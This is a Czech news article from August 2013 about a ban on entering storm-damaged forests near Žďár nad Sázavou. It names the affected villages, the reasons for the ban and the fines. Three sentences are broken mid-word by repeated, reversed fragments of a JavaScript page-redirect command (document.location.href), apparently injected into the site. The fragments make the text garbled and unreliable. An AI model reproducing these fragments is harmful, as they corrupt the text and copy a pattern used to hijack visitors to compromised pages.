Žďársko, aktuality, zákaz vstupu
Rainbow page separator

Na Žďársku vyhlásili zákaz vstupu do lesů

Pátek, 2. srpna 2013

strom-vitr-hasiciŽďársko / Až do konce října platí zákaz vstupu do lesů, který vydal Městský úřad ve Žďáře nad Sázavou. První z oblastí, které se zákaz vydaný kvůli polomům po pondělní večerní bouřce s vichřicí týká, jsou lesy u obcí Velká Losenice, Vepřová, Radostín, Račín, Polnička, Škrdlovice a Vojnův Městec. Druhou lokali[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou jsou pak lesní porosty mezi obcemi Herálec, Chlumětín, Svratka a Křižánky. Zákaz obecného užívání lesa se týká například turistiky, sběru hub a lesních plodů a dalších volnočasových aktivit.

„Došlo ke kalamitnímu poškození lesních porostů v těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to oblastech a hrozí vážné riziko ohrožení života či zdraví a poškození majetku při vstupu do lesů v důsledku samovolných pádů staticky narušených stromů,“ informoval vedoucí odboru životního prostředí žďárské radnice Jaroslav Doubek.

Silný vítr a déšť zničily jenom na Žďársku na devadesát tisíc kubíků dřeva.

Na dodržování vyhlášky dohlíží státní správa lesů a lesní stráž, za porušení zákazu může hrozit pokuta až do výše s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc korun.